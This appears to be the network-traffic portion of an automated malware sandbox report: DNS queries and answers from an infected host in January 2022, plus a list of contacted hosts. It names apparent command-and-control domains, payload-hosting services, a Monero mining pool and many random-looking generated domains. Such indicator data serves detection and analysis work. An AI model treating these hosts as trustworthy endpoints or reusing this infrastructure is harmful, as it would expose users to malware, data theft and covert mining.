Jan 14, 2022 00:15:55.453470945 CET	192.168.2.4	8.8.8.8	0x9efd	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:55.614363909 CET	192.168.2.4	8.8.8.8	0x8aed	Standard query (0)	goo.su	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.026356936 CET	192.168.2.4	8.8.8.8	0xc7d7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.208574057 CET	192.168.2.4	8.8.8.8	0x4298	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.423022985 CET	192.168.2.4	8.8.8.8	0x29f3	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.580876112 CET	192.168.2.4	8.8.8.8	0xc73a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.747313023 CET	192.168.2.4	8.8.8.8	0x31e0	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.914865971 CET	192.168.2.4	8.8.8.8	0x9952	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:57.103195906 CET	192.168.2.4	8.8.8.8	0xf2c	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:59.355787039 CET	192.168.2.4	8.8.8.8	0x5dfa	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:59.521006107 CET	192.168.2.4	8.8.8.8	0x51da	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:59.755677938 CET	192.168.2.4	8.8.8.8	0x9907	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.044022083 CET	192.168.2.4	8.8.8.8	0x5b1b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.223881960 CET	192.168.2.4	8.8.8.8	0xd305	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.390018940 CET	192.168.2.4	8.8.8.8	0x48a5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.591588974 CET	192.168.2.4	8.8.8.8	0x6886	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.824183941 CET	192.168.2.4	8.8.8.8	0x7dc1	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:03.016208887 CET	192.168.2.4	8.8.8.8	0xcdf3	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:03.189146996 CET	192.168.2.4	8.8.8.8	0xd2ab	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:03.358738899 CET	192.168.2.4	8.8.8.8	0x10e6	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:06.475105047 CET	192.168.2.4	8.8.8.8	0x1d04	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:06.636070967 CET	192.168.2.4	8.8.8.8	0x47a2	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:06.801625967 CET	192.168.2.4	8.8.8.8	0xd460	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:08.337502003 CET	192.168.2.4	8.8.8.8	0xd5ff	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:08.555936098 CET	192.168.2.4	8.8.8.8	0xb8a9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:08.839423895 CET	192.168.2.4	8.8.8.8	0xa9f5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:09.013679981 CET	192.168.2.4	8.8.8.8	0xc4ec	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:11.631227970 CET	192.168.2.4	8.8.8.8	0xb620	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:12.475086927 CET	192.168.2.4	8.8.8.8	0x824c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:12.673590899 CET	192.168.2.4	8.8.8.8	0xce37	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:13.988838911 CET	192.168.2.4	8.8.8.8	0xe413	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:14.287476063 CET	192.168.2.4	8.8.8.8	0xb20f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:14.658121109 CET	192.168.2.4	8.8.8.8	0x165	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:18.495066881 CET	192.168.2.4	8.8.8.8	0x185	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:18.692121983 CET	192.168.2.4	8.8.8.8	0x7768	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:21.204607964 CET	192.168.2.4	8.8.8.8	0xcd02	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:21.791950941 CET	192.168.2.4	8.8.8.8	0x670c	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:22.426749945 CET	192.168.2.4	8.8.8.8	0xd3fe	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.147851944 CET	192.168.2.4	8.8.8.8	0x3019	Standard query (0)	patmushta.info	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.197062969 CET	192.168.2.4	8.8.8.8	0xdbf8	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.203850031 CET	192.168.2.4	8.8.8.8	0x8de8	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.748819113 CET	192.168.2.4	8.8.8.8	0xa426	Standard query (0)	a0621298.xsph.ru	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:31.828166962 CET	192.168.2.4	8.8.8.8	0x8a9	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:33.387123108 CET	192.168.2.4	8.8.8.8	0x22e	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:51.736057043 CET	192.168.2.4	8.8.8.8	0xdb81	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:17:13.778686047 CET	192.168.2.4	8.8.8.8	0x5e1	Standard query (0)	patmushta.info	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 14, 2022 00:15:08.466722965 CET	8.8.8.8	192.168.2.4	0x1e78	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:08.926810026 CET	8.8.8.8	192.168.2.4	0x7eb5	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:09.401787996 CET	8.8.8.8	192.168.2.4	0xbc1c	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:09.575335979 CET	8.8.8.8	192.168.2.4	0x8fba	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:10.039287090 CET	8.8.8.8	192.168.2.4	0xf7ef	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:10.473891973 CET	8.8.8.8	192.168.2.4	0xdd6e	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:12.090094090 CET	8.8.8.8	192.168.2.4	0x4665	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:12.250962019 CET	8.8.8.8	192.168.2.4	0x96b7	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:12.447144985 CET	8.8.8.8	192.168.2.4	0x550f	No error (0)	data-host-coin-8.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:14.257040977 CET	8.8.8.8	192.168.2.4	0xcfa	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:14.427084923 CET	8.8.8.8	192.168.2.4	0xa3f6	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:14.904640913 CET	8.8.8.8	192.168.2.4	0x786b	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:15.190542936 CET	8.8.8.8	192.168.2.4	0xe925	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:15.666140079 CET	8.8.8.8	192.168.2.4	0x9efb	No error (0)	privacy-tools-for-you-780.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:17.977097034 CET	8.8.8.8	192.168.2.4	0x644f	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:18.161992073 CET	8.8.8.8	192.168.2.4	0x60c7	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:18.650316000 CET	8.8.8.8	192.168.2.4	0x9905	No error (0)	unicupload.top		54.38.220.85	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:18.739072084 CET	8.8.8.8	192.168.2.4	0x4acb	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:19.402050972 CET	8.8.8.8	192.168.2.4	0xa2b4	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:19.897456884 CET	8.8.8.8	192.168.2.4	0x1c8c	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:20.083414078 CET	8.8.8.8	192.168.2.4	0xc340	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:20.562536001 CET	8.8.8.8	192.168.2.4	0x2005	No error (0)	data-host-coin-8.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.423297882 CET	8.8.8.8	192.168.2.4	0x5113	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.586868048 CET	8.8.8.8	192.168.2.4	0x9be3	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.754504919 CET	8.8.8.8	192.168.2.4	0xdd94	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.920911074 CET	8.8.8.8	192.168.2.4	0x4237	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:24.943259954 CET	8.8.8.8	192.168.2.4	0xac12	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.101136923 CET	8.8.8.8	192.168.2.4	0x65db	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.297411919 CET	8.8.8.8	192.168.2.4	0xd16a	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.463532925 CET	8.8.8.8	192.168.2.4	0x2be3	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.463532925 CET	8.8.8.8	192.168.2.4	0x2be3	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.463532925 CET	8.8.8.8	192.168.2.4	0x2be3	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.463532925 CET	8.8.8.8	192.168.2.4	0x2be3	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.463532925 CET	8.8.8.8	192.168.2.4	0x2be3	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:27.160053968 CET	8.8.8.8	192.168.2.4	0xe05	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:27.333893061 CET	8.8.8.8	192.168.2.4	0xc920	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:27.495369911 CET	8.8.8.8	192.168.2.4	0x45d7	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:39.956341028 CET	8.8.8.8	192.168.2.4	0xd04f	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:39.956341028 CET	8.8.8.8	192.168.2.4	0xd04f	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.54.36	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:39.956341028 CET	8.8.8.8	192.168.2.4	0xd04f	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:39.956341028 CET	8.8.8.8	192.168.2.4	0xd04f	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:39.956341028 CET	8.8.8.8	192.168.2.4	0xd04f	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.0	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:42.897193909 CET	8.8.8.8	192.168.2.4	0x6af	No error (0)	patmushta.info		8.209.67.104	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:48.703727007 CET	8.8.8.8	192.168.2.4	0x9e4b	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:48.873003960 CET	8.8.8.8	192.168.2.4	0x56ab	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.115181923 CET	8.8.8.8	192.168.2.4	0x22c2	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.279900074 CET	8.8.8.8	192.168.2.4	0xafe7	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.443753004 CET	8.8.8.8	192.168.2.4	0xda2a	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.610033989 CET	8.8.8.8	192.168.2.4	0x9b8	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.790723085 CET	8.8.8.8	192.168.2.4	0xe42d	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.081588984 CET	8.8.8.8	192.168.2.4	0x1ab9	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.252104998 CET	8.8.8.8	192.168.2.4	0xbd50	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.413388014 CET	8.8.8.8	192.168.2.4	0x96b5	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.582348108 CET	8.8.8.8	192.168.2.4	0xdc5d	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.770617008 CET	8.8.8.8	192.168.2.4	0x9e07	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.936686993 CET	8.8.8.8	192.168.2.4	0xee49	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:51.145322084 CET	8.8.8.8	192.168.2.4	0x2dda	No error (0)	data-host-coin-8.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:55.314858913 CET	8.8.8.8	192.168.2.4	0x10d7	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:55.472961903 CET	8.8.8.8	192.168.2.4	0x9efd	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:55.635926008 CET	8.8.8.8	192.168.2.4	0x8aed	No error (0)	goo.su		104.21.38.221	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:55.635926008 CET	8.8.8.8	192.168.2.4	0x8aed	No error (0)	goo.su		172.67.139.105	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.045312881 CET	8.8.8.8	192.168.2.4	0xc7d7	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.225570917 CET	8.8.8.8	192.168.2.4	0x4298	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.442231894 CET	8.8.8.8	192.168.2.4	0x29f3	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.600402117 CET	8.8.8.8	192.168.2.4	0xc73a	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.764776945 CET	8.8.8.8	192.168.2.4	0x31e0	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:56.934189081 CET	8.8.8.8	192.168.2.4	0x9952	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:57.123147011 CET	8.8.8.8	192.168.2.4	0xf2c	No error (0)	data-host-coin-8.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:59.375186920 CET	8.8.8.8	192.168.2.4	0x5dfa	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:59.541596889 CET	8.8.8.8	192.168.2.4	0x51da	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:59.774959087 CET	8.8.8.8	192.168.2.4	0x9907	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.064773083 CET	8.8.8.8	192.168.2.4	0x5b1b	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.243716002 CET	8.8.8.8	192.168.2.4	0xd305	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.410080910 CET	8.8.8.8	192.168.2.4	0x48a5	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.609232903 CET	8.8.8.8	192.168.2.4	0x6886	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:02.845551968 CET	8.8.8.8	192.168.2.4	0x7dc1	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:03.037575960 CET	8.8.8.8	192.168.2.4	0xcdf3	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:03.209789038 CET	8.8.8.8	192.168.2.4	0xd2ab	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:03.380450010 CET	8.8.8.8	192.168.2.4	0x10e6	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:06.494786978 CET	8.8.8.8	192.168.2.4	0x1d04	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:06.655414104 CET	8.8.8.8	192.168.2.4	0x47a2	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:06.821372032 CET	8.8.8.8	192.168.2.4	0xd460	No error (0)	data-host-coin-8.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:08.358143091 CET	8.8.8.8	192.168.2.4	0xd5ff	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:08.573673010 CET	8.8.8.8	192.168.2.4	0xb8a9	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:08.859005928 CET	8.8.8.8	192.168.2.4	0xa9f5	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:09.300795078 CET	8.8.8.8	192.168.2.4	0xc4ec	No error (0)	data-host-coin-8.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:11.650517941 CET	8.8.8.8	192.168.2.4	0xb620	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:12.494309902 CET	8.8.8.8	192.168.2.4	0x824c	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:12.692929983 CET	8.8.8.8	192.168.2.4	0xce37	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:14.010508060 CET	8.8.8.8	192.168.2.4	0xe413	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:14.304579020 CET	8.8.8.8	192.168.2.4	0xb20f	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:14.678030968 CET	8.8.8.8	192.168.2.4	0x165	No error (0)	host-data-coin-11.com		93.189.42.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:18.515554905 CET	8.8.8.8	192.168.2.4	0x185	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:18.712820053 CET	8.8.8.8	192.168.2.4	0x7768	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:21.225965977 CET	8.8.8.8	192.168.2.4	0xcd02	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:21.818962097 CET	8.8.8.8	192.168.2.4	0x670c	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:22.446170092 CET	8.8.8.8	192.168.2.4	0xd3fe	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.220061064 CET	8.8.8.8	192.168.2.4	0xdbf8	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.220061064 CET	8.8.8.8	192.168.2.4	0xdbf8	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.220061064 CET	8.8.8.8	192.168.2.4	0xdbf8	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.220061064 CET	8.8.8.8	192.168.2.4	0xdbf8	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.220061064 CET	8.8.8.8	192.168.2.4	0xdbf8	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.226542950 CET	8.8.8.8	192.168.2.4	0x8de8	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.226542950 CET	8.8.8.8	192.168.2.4	0x8de8	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.226542950 CET	8.8.8.8	192.168.2.4	0x8de8	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.226542950 CET	8.8.8.8	192.168.2.4	0x8de8	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.226542950 CET	8.8.8.8	192.168.2.4	0x8de8	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.253052950 CET	8.8.8.8	192.168.2.4	0x3019	No error (0)	patmushta.info		8.209.67.104	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:23.767479897 CET	8.8.8.8	192.168.2.4	0xa426	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:31.850064993 CET	8.8.8.8	192.168.2.4	0x8a9	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:31.850064993 CET	8.8.8.8	192.168.2.4	0x8a9	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:31.850064993 CET	8.8.8.8	192.168.2.4	0x8a9	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:31.850064993 CET	8.8.8.8	192.168.2.4	0x8a9	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:31.850064993 CET	8.8.8.8	192.168.2.4	0x8a9	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:33.406083107 CET	8.8.8.8	192.168.2.4	0x22e	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:33.406083107 CET	8.8.8.8	192.168.2.4	0x22e	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:33.406083107 CET	8.8.8.8	192.168.2.4	0x22e	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:33.406083107 CET	8.8.8.8	192.168.2.4	0x22e	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.54.36	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:33.406083107 CET	8.8.8.8	192.168.2.4	0x22e	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.0	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:51.757019043 CET	8.8.8.8	192.168.2.4	0xdb81	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2022 00:16:51.757019043 CET	8.8.8.8	192.168.2.4	0xdb81	No error (0)	pool-fr.supportxmr.com		91.121.140.167	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:51.757019043 CET	8.8.8.8	192.168.2.4	0xdb81	No error (0)	pool-fr.supportxmr.com		149.202.83.171	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:51.757019043 CET	8.8.8.8	192.168.2.4	0xdb81	No error (0)	pool-fr.supportxmr.com		37.187.95.110	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:51.757019043 CET	8.8.8.8	192.168.2.4	0xdb81	No error (0)	pool-fr.supportxmr.com		94.23.23.52	A (IP address)	IN (0x0001)
Jan 14, 2022 00:16:51.757019043 CET	8.8.8.8	192.168.2.4	0xdb81	No error (0)	pool-fr.supportxmr.com		94.23.247.226	A (IP address)	IN (0x0001)
Jan 14, 2022 00:17:13.884191990 CET	8.8.8.8	192.168.2.4	0x5e1	No error (0)	patmushta.info		8.209.67.104	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

lkoyuevdx.net

host-data-coin-11.com

secxfi.net

vuafh.org

psxblf.com

dsdofcnp.com

obbsps.com

ttkljrkl.com

fvjjmgnhpi.org

data-host-coin-8.com

giblvuodn.org

unjilfapdr.net

bnrfjahkht.net

epntadtm.net

privacy-tools-for-you-780.com

yevvbkvx.org

psfbiu.com

unicupload.top

phnfrhmjav.com

etxdniy.com

tlotvuqfn.net

bjfnimnu.org

mkbyakqqj.com

reeitd.net

vnmaltjgi.net

fmegeducg.org

185.7.214.171:8080

ghiodndfpo.com

njpun.net

rmhfrtkprf.net

ynkqvnpya.com

pnfnlpnysf.com

mosjbuj.net

oytdv.net

rljjkyrr.net

jpqcmep.com

fosbja.com

rcjgja.net

